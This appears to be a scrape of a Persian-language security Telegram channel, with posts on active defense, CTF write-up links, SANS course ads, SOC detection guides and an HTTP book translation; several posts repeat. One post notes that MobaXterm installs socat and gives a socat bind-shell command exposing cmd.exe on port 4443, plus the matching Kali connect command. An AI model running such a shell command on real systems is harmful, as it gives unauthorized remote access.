Forwarded from dfir
🔐 مراحل اجرای دفاع فعال (Active Defense) در سازمان 🔐
------------------------------
در دنیای امروز که تهدیدات سایبری بهطور مداوم در حال تغییر و پیشرفت هستند، سازمانها نیاز به رویکردهای پیشگیرانه و پیشدستانه برای شناسایی، تحلیل و پاسخ به تهدیدات دارند. دفاع فعال (Active Defense) یکی از این رویکردهاست که به سازمانها کمک میکند تا به صورت پیشدستانه از خود در برابر حملات سایبری محافظت کنند. در ادامه به مراحل اجرای دفاع فعال در سازمان میپردازیم:
1. ارزیابی وضعیت فعلی امنیتی
- شناسایی داراییها و تحلیل ریسک: لیست کردن تمامی داراییهای دیجیتال شامل سختافزارها، نرمافزارها و دادهها و ارزیابی ریسکهای مرتبط با هر دارایی.
- بررسی زیرساختهای امنیتی فعلی: شناسایی نقاط ضعف و قوت در زیرساختهای امنیتی فعلی سازمان و تعیین نیازمندیهای امنیتی.
2. طراحی استراتژی دفاع فعال
- تدوین سیاستها و فرآیندها: تدوین سیاستهای امنیتی مبتنی بر دفاع فعال و فرآیندهای مشخص برای پاسخ به انواع مختلف حوادث امنیتی.
- انتخاب ابزارها و تکنیکهای دفاع فعال: انتخاب و پیادهسازی ابزارهای پیشرفته برای شناسایی تهدیدات مانند SIEM، EDR و IDS و استفاده از فناوریهای فریب مانند هانیپاتها و دامافزارها.
3. پیادهسازی و استقرار
- پیادهسازی ابزارهای تشخیص و پاسخ: نصب و پیکربندی سیستمهای مدیریت رویداد و اطلاعات امنیتی (SIEM) و ابزارهای شناسایی و پاسخ به نقاط انتهایی (EDR).
- راه اندازی تکنیکهای فریب: ایجاد هانیپاتها و دامافزارها در نقاط استراتژیک شبکه برای جذب مهاجمان و تحلیل رفتارهای آنها.
4. نظارت و مانیتورینگ مستمر
- مانیتورینگ 24/7: نظارت مداوم بر تمامی فعالیتهای شبکه و سیستمها برای شناسایی تهدیدات و ناهنجاریها.
- تحلیل و ارزیابی مداوم: تحلیل مداوم لاگها و رویدادهای امنیتی و ارزیابی اثربخشی ابزارها و تکنیکهای دفاع فعال.
5. پاسخ به حوادث و بازیابی
- پاسخ سریع به حوادث: ایزوله کردن سیستمهای آلوده و تحلیل سریع تهدیدات برای رفع آنها.
- بازیابی و بازسازی: بازیابی دادهها و سیستمهای آسیبدیده و اطمینان از برقراری مجدد امنیت.
6. آموزش و توسعه مداوم
- آموزش_تیم_امنیتی: برگزاری دورههای آموزشی منظم و اجرای تمرینهای شبیهسازی حملات.
- بهبود_مستمر: ارزیابی مداوم عملکرد تیم امنیتی و بهروزرسانی سیاستها و فرآیندهای امنیتی.
🌟 نتیجهگیری
اجرای دفاع فعال در سازمان به معنای اتخاذ رویکردهای پیشگیرانه و پیشدستانه برای شناسایی، تحلیل و پاسخ به تهدیدات سایبری است. با پیادهسازی مراحل فوق، سازمانها میتوانند امنیت خود را بهطور چشمگیری افزایش دهند و از آسیبهای جدی ناشی از حملات سایبری جلوگیری کنند.
🔗 برای اطلاعات بیشتر و به اشتراکگذاری تجربیات خود در زمینه دفاع فعال و امنیت سایبری، با من در ارتباط باشید!
#امنیت_سایبری #دفاع_فعال #شناسایی_تهدید #امنیت_اطلاعات #SOC #شکار_تهدیدات #SIEM #EDR #هانی_پات #فریب_امنیتی
------------------------------
در دنیای امروز که تهدیدات سایبری بهطور مداوم در حال تغییر و پیشرفت هستند، سازمانها نیاز به رویکردهای پیشگیرانه و پیشدستانه برای شناسایی، تحلیل و پاسخ به تهدیدات دارند. دفاع فعال (Active Defense) یکی از این رویکردهاست که به سازمانها کمک میکند تا به صورت پیشدستانه از خود در برابر حملات سایبری محافظت کنند. در ادامه به مراحل اجرای دفاع فعال در سازمان میپردازیم:
1. ارزیابی وضعیت فعلی امنیتی
- شناسایی داراییها و تحلیل ریسک: لیست کردن تمامی داراییهای دیجیتال شامل سختافزارها، نرمافزارها و دادهها و ارزیابی ریسکهای مرتبط با هر دارایی.
- بررسی زیرساختهای امنیتی فعلی: شناسایی نقاط ضعف و قوت در زیرساختهای امنیتی فعلی سازمان و تعیین نیازمندیهای امنیتی.
2. طراحی استراتژی دفاع فعال
- تدوین سیاستها و فرآیندها: تدوین سیاستهای امنیتی مبتنی بر دفاع فعال و فرآیندهای مشخص برای پاسخ به انواع مختلف حوادث امنیتی.
- انتخاب ابزارها و تکنیکهای دفاع فعال: انتخاب و پیادهسازی ابزارهای پیشرفته برای شناسایی تهدیدات مانند SIEM، EDR و IDS و استفاده از فناوریهای فریب مانند هانیپاتها و دامافزارها.
3. پیادهسازی و استقرار
- پیادهسازی ابزارهای تشخیص و پاسخ: نصب و پیکربندی سیستمهای مدیریت رویداد و اطلاعات امنیتی (SIEM) و ابزارهای شناسایی و پاسخ به نقاط انتهایی (EDR).
- راه اندازی تکنیکهای فریب: ایجاد هانیپاتها و دامافزارها در نقاط استراتژیک شبکه برای جذب مهاجمان و تحلیل رفتارهای آنها.
4. نظارت و مانیتورینگ مستمر
- مانیتورینگ 24/7: نظارت مداوم بر تمامی فعالیتهای شبکه و سیستمها برای شناسایی تهدیدات و ناهنجاریها.
- تحلیل و ارزیابی مداوم: تحلیل مداوم لاگها و رویدادهای امنیتی و ارزیابی اثربخشی ابزارها و تکنیکهای دفاع فعال.
5. پاسخ به حوادث و بازیابی
- پاسخ سریع به حوادث: ایزوله کردن سیستمهای آلوده و تحلیل سریع تهدیدات برای رفع آنها.
- بازیابی و بازسازی: بازیابی دادهها و سیستمهای آسیبدیده و اطمینان از برقراری مجدد امنیت.
6. آموزش و توسعه مداوم
- آموزش_تیم_امنیتی: برگزاری دورههای آموزشی منظم و اجرای تمرینهای شبیهسازی حملات.
- بهبود_مستمر: ارزیابی مداوم عملکرد تیم امنیتی و بهروزرسانی سیاستها و فرآیندهای امنیتی.
🌟 نتیجهگیری
اجرای دفاع فعال در سازمان به معنای اتخاذ رویکردهای پیشگیرانه و پیشدستانه برای شناسایی، تحلیل و پاسخ به تهدیدات سایبری است. با پیادهسازی مراحل فوق، سازمانها میتوانند امنیت خود را بهطور چشمگیری افزایش دهند و از آسیبهای جدی ناشی از حملات سایبری جلوگیری کنند.
🔗 برای اطلاعات بیشتر و به اشتراکگذاری تجربیات خود در زمینه دفاع فعال و امنیت سایبری، با من در ارتباط باشید!
#امنیت_سایبری #دفاع_فعال #شناسایی_تهدید #امنیت_اطلاعات #SOC #شکار_تهدیدات #SIEM #EDR #هانی_پات #فریب_امنیتی
Forwarded from challenginno.ir
✔️ رایت آپ مربوط به چالش AD Credential Dump هم اکنون در سایت قرار شد.
🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/blog/active-directory-credential-dumping
🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/blog/active-directory-credential-dumping
✅ کتاب آشنایی با پروتکل HTTP - بخش شانزدهم
✔️ در این بخش به فصل پانزدهم از کتاب HTTP The Definitive Guide با عنوان Internationalization پرداخته شده است.
🔴 جهت دانلود ترجمه بخش شانزدهم از این کتاب به لینک زیر مراجعه نمایید:
🌐 yun.ir/5je852
✔️ در این بخش به فصل پانزدهم از کتاب HTTP The Definitive Guide با عنوان Internationalization پرداخته شده است.
🔴 جهت دانلود ترجمه بخش شانزدهم از این کتاب به لینک زیر مراجعه نمایید:
🌐 yun.ir/5je852
Forwarded from challenginno.ir
✔️ رایت آپ مربوط به چالش آنالیز بسته های شبکه (Cisco) هم اکنون در سایت قرار شد.
🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/blog/cisco-packet-analysis
🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/blog/cisco-packet-analysis
Forwarded from SecCode (Meisam Monsef)
This media is not supported in your browser
VIEW IN TELEGRAM
مصاحبه سینا خیرخواه که یکی از شاگردان بسیار موفق من در برنامه
Critical Thinking - Bug Bounty Podcast
خیلی خوشحال هستم که با تلاش های خودت توانستی به موفقیت های بزرگ برسی
امیدوار هستم که هرجا هستی موفق و پیروز باشی
لینک کامل مصاحبه :https://www.youtube.com/watch?v=S78r0Pc5ph4
@SecCode
Critical Thinking - Bug Bounty Podcast
خیلی خوشحال هستم که با تلاش های خودت توانستی به موفقیت های بزرگ برسی
امیدوار هستم که هرجا هستی موفق و پیروز باشی
لینک کامل مصاحبه :https://www.youtube.com/watch?v=S78r0Pc5ph4
@SecCode
Forwarded from challenginno.ir
✔️ در فرآیند تست نفوذ، انجام اسکن شبکه و پورت، بسیار مهم است. پس از شناسایی IP و پورت های باز یک سیستم در شبکه، می بایست سرویس هایی که بر روی پورت ها در حال فعالیت هستند نیز شناسایی شود.
✅ پس از شناسایی سرویس، نوبت به شناسایی آسیب پذیری موجود بر روی آن است.
✅ این چالش به همین موضوع می پردازد و شما می بایست مراحل مذکور را انجام داده و سرویس آسیب پذیری را شناسایی کنید.
✅ لازم به ذکر است که این چالش،اولین چالش است که در محیط ویندوز ایجاد شده و در سایت قرار می گیرد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/web-service-vulnerabilities-windows
✅ پس از شناسایی سرویس، نوبت به شناسایی آسیب پذیری موجود بر روی آن است.
✅ این چالش به همین موضوع می پردازد و شما می بایست مراحل مذکور را انجام داده و سرویس آسیب پذیری را شناسایی کنید.
✅ لازم به ذکر است که این چالش،اولین چالش است که در محیط ویندوز ایجاد شده و در سایت قرار می گیرد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/web-service-vulnerabilities-windows
✅ دوره آموزشی SEC401
✔️ در این دوره آموزشی شما با مفاهیم پایه ای حوزه امنیت شبکه و اطلاعات آشنا می شوید. این دوره به عنوان اولین دوره از نقشه راه موسسه SANS مباحث مختلفی را مورد بحث قرار می دهد که در ادامه شما را برای ورود به بخش های دیگر آماده می سازد.
🔰 بخش هایی از سرفصل دوره آموزشی SEC401
Defensible Network Architecture
Networking and Protocols
Network Device Security
Virtualization and Cloud Security
Securing Wireless Networks
Defense-in-Depth
Access Control and Password Management
Security Policy
CIS Controls
Malicious Code and Exploit Mitigation
Securing Web Communications
Vulnerability Scanning and Penetration Testing
Network Security Devices
Endpoint Security
SIEM-Log Management
Active Defense
Cryptography
Cryptography Algorithms and Deployment
Applying Cryptography
Incident Handling and Contingency Planning
🔴 جهت مشاهده جزئیات این دوره و تهیه آن به لینک زیر مراجعه نمایید:
🌐 yun.ir/ztqnld
✔️ در این دوره آموزشی شما با مفاهیم پایه ای حوزه امنیت شبکه و اطلاعات آشنا می شوید. این دوره به عنوان اولین دوره از نقشه راه موسسه SANS مباحث مختلفی را مورد بحث قرار می دهد که در ادامه شما را برای ورود به بخش های دیگر آماده می سازد.
🔰 بخش هایی از سرفصل دوره آموزشی SEC401
Defensible Network Architecture
Networking and Protocols
Network Device Security
Virtualization and Cloud Security
Securing Wireless Networks
Defense-in-Depth
Access Control and Password Management
Security Policy
CIS Controls
Malicious Code and Exploit Mitigation
Securing Web Communications
Vulnerability Scanning and Penetration Testing
Network Security Devices
Endpoint Security
SIEM-Log Management
Active Defense
Cryptography
Cryptography Algorithms and Deployment
Applying Cryptography
Incident Handling and Contingency Planning
🔴 جهت مشاهده جزئیات این دوره و تهیه آن به لینک زیر مراجعه نمایید:
🌐 yun.ir/ztqnld
Forwarded from challenginno.ir
✔️ رایت آپ مربوط به چالش ارتقاء سطح دسترسی در لینوکس 3 - Warm-up هم اکنون در سایت قرار شد.
🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/blog/linux-privilege-escalation-warm-up
🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/blog/linux-privilege-escalation-warm-up
سلام و عرض ادب خدمت دوستان گرامی
یکی از روش های دسترسی به سیستم هدف و Reverse، استفاده از ابزارهایی مانند netcat هست
ابزار nc یا netcat اغلب توسط سیستم های امنیتی شناسایی می شه
ابزار دیگر که در حوزه red team هم استفاده می شه ابزار socat هست
نکته جالب اینجاست که اگر شما ابزار MobaXterm رو در سیستم داشته باشید به صورت پیش فرض با یک بار اجرای این ابزار بر روی سیستم، socat به همراه تمام DLL های مورد نیاز روی سیستم ایجاد می شوند و دقیقا اجازه ارتباط رو می دهد.
مسیر قرار گرفتن socat در آخرین نسخه ابزار MobaXterm که من نصب کردم به صورت زیر است (پروفایل کاربر):
C:\Users\test\AppData\Roaming\MobaXterm\slash\bin
به نظرم از این ابزار استفاده نشه بهتر هست چراکه با این موضوع فقط نیاز هست که نفوذگر بدونه این نرم افزار نصبه دیگه نیازی به انتقال فایل بر روی سیستم قربانی نداره
دستور ایجاد کانکش جهت تست هم به شکل زیر هست:
Windows:
socat -d -d TCP4-LISTEN:4443 EXEC:'cmd.exe',pipes
Kali:
socat - TCP4:192.168.66.132:4443
یکی از روش های دسترسی به سیستم هدف و Reverse، استفاده از ابزارهایی مانند netcat هست
ابزار nc یا netcat اغلب توسط سیستم های امنیتی شناسایی می شه
ابزار دیگر که در حوزه red team هم استفاده می شه ابزار socat هست
نکته جالب اینجاست که اگر شما ابزار MobaXterm رو در سیستم داشته باشید به صورت پیش فرض با یک بار اجرای این ابزار بر روی سیستم، socat به همراه تمام DLL های مورد نیاز روی سیستم ایجاد می شوند و دقیقا اجازه ارتباط رو می دهد.
مسیر قرار گرفتن socat در آخرین نسخه ابزار MobaXterm که من نصب کردم به صورت زیر است (پروفایل کاربر):
C:\Users\test\AppData\Roaming\MobaXterm\slash\bin
به نظرم از این ابزار استفاده نشه بهتر هست چراکه با این موضوع فقط نیاز هست که نفوذگر بدونه این نرم افزار نصبه دیگه نیازی به انتقال فایل بر روی سیستم قربانی نداره
دستور ایجاد کانکش جهت تست هم به شکل زیر هست:
Windows:
socat -d -d TCP4-LISTEN:4443 EXEC:'cmd.exe',pipes
Kali:
socat - TCP4:192.168.66.132:4443
Forwarded from challenginno.ir
✔️ یکی از سرویس هایی که در اکثر سازمان ها مورد استفاده قرار می گیرد سرویس Active Directory می باشد.
✅ در صورتی که سرویس Active Directory مورد حمله قرار گرفته و Compromise شود، امکان به خطر افتادن کل شبکه وجود خواهد داشت.
✅ در این چالش رویکرد ما بررسی آسیب پذیری موجود بر روی Active Directory است.
✅ لازم به ذکر است که این چالش اولین چالش مربوط به Active Directory بوده و چالش های دیگر به مرور در سایت قرار داده خواهد شد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/activedirectory-zero
✅ در صورتی که سرویس Active Directory مورد حمله قرار گرفته و Compromise شود، امکان به خطر افتادن کل شبکه وجود خواهد داشت.
✅ در این چالش رویکرد ما بررسی آسیب پذیری موجود بر روی Active Directory است.
✅ لازم به ذکر است که این چالش اولین چالش مربوط به Active Directory بوده و چالش های دیگر به مرور در سایت قرار داده خواهد شد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/activedirectory-zero
Forwarded from dfir
سند راهنمای SOC برای شناسایی و پاسخگویی به سوءاستفاده از آسیبپذیری CVE-2024-21412
👇👇👇👇👇👇
👇👇👇👇👇👇
Forwarded from dfir
سند_راهنمای_SOC_برای_شناسایی_و_پاسخگویی_به_سوءاستفاده_از_آسیب.pdf
810.8 KB
سند راهنمای SOC برای شناسایی و پاسخگویی به سوءاستفاده از آسیبپذیری CVE-2024-21412
Forwarded from dfir
CVE_2024_21412_vulnerability_in_Microsoft_Windows_SmartScreen.csv
2.9 KB
IOC- vulnerability
Forwarded from dfir
سند راهنمای تشخیص تکنیک دور زدن EDR با متد LayeredSyscall
The detection guide document for the EDR evasion technique using the LayeredSyscall method.
به همراه رول های تشخیصی ELK, Sysmon, splunk 👇👇👇👇👇👇👇👇
The detection guide document for the EDR evasion technique using the LayeredSyscall method.
به همراه رول های تشخیصی ELK, Sysmon, splunk 👇👇👇👇👇👇👇👇
✅ کتاب آشنایی با پروتکل HTTP
✔️ با توجه به استفاده روز افزون از وب و تکنولوژیهای مربتط با آن، آشنایی با پروتکل HTTP که پایه و اساس ساختار وب را تشکیل میدهد، بسیار حائز اهمیت است.
✔️ این کتاب که ترجمه کتاب HTTP The Definitive Guide است، به معرفی بخشهای مختلف این پروتکل میپردازد.
🔴 دانستن جزئیات مربوط به پروتکل HTTP برای علاقمندان به حوزههای وب، تست نفوذ وب، باگ بانتی، برنامه نویسان، محققین و دانشجویان فناوری اطلاعات بسیار مفید خواهد بود.
🌐 https://securityworld.ir/HTTP/HTTP-Final.pdf
✔️ با توجه به استفاده روز افزون از وب و تکنولوژیهای مربتط با آن، آشنایی با پروتکل HTTP که پایه و اساس ساختار وب را تشکیل میدهد، بسیار حائز اهمیت است.
✔️ این کتاب که ترجمه کتاب HTTP The Definitive Guide است، به معرفی بخشهای مختلف این پروتکل میپردازد.
🔴 دانستن جزئیات مربوط به پروتکل HTTP برای علاقمندان به حوزههای وب، تست نفوذ وب، باگ بانتی، برنامه نویسان، محققین و دانشجویان فناوری اطلاعات بسیار مفید خواهد بود.
🌐 https://securityworld.ir/HTTP/HTTP-Final.pdf
💡با سلام و عرض ادب خدمت کلیه دوستان گرامی
✔️ موسسه SANS یکی از شرکت های معتبر در زمینه آموزش های امنیت شبکه و اطلاعات می باشد. با توجه به دوره های تفکیک شده ای که این شرکت ارائه می کند، مدتی است که مورد توجه علاقمندان حوزه امنیت قرار گرفته است.
✔️ یکی از دوره هایی که در نقشه راه تست نفوذ موسسه SNAS، مطالعه آن پیشنهاد شده، دوره تست نفوذ وب یا همان SEC542 می باشد.
🔰 هم اکنون این دوره آموزشی به صورت مجزا و در پنج بخش زیر قابل تهیه می باشد:
✅ بخش اول - Introduction and Information Gathering
yun.ir/79yazd
✅ بخش دوم - Configuration, Identity, and Authentication Testing
yun.ir/z0v5pc
✅ بخش سوم - Injection
yun.ir/126apf
✅ بخش چهارم - XSS-XXE
yun.ir/xzat28
✅ بخش پنجم - CSRF, Logic Flaws and Advanced Tools
yun.ir/pkjugd
✔️ موسسه SANS یکی از شرکت های معتبر در زمینه آموزش های امنیت شبکه و اطلاعات می باشد. با توجه به دوره های تفکیک شده ای که این شرکت ارائه می کند، مدتی است که مورد توجه علاقمندان حوزه امنیت قرار گرفته است.
✔️ یکی از دوره هایی که در نقشه راه تست نفوذ موسسه SNAS، مطالعه آن پیشنهاد شده، دوره تست نفوذ وب یا همان SEC542 می باشد.
🔰 هم اکنون این دوره آموزشی به صورت مجزا و در پنج بخش زیر قابل تهیه می باشد:
✅ بخش اول - Introduction and Information Gathering
yun.ir/79yazd
✅ بخش دوم - Configuration, Identity, and Authentication Testing
yun.ir/z0v5pc
✅ بخش سوم - Injection
yun.ir/126apf
✅ بخش چهارم - XSS-XXE
yun.ir/xzat28
✅ بخش پنجم - CSRF, Logic Flaws and Advanced Tools
yun.ir/pkjugd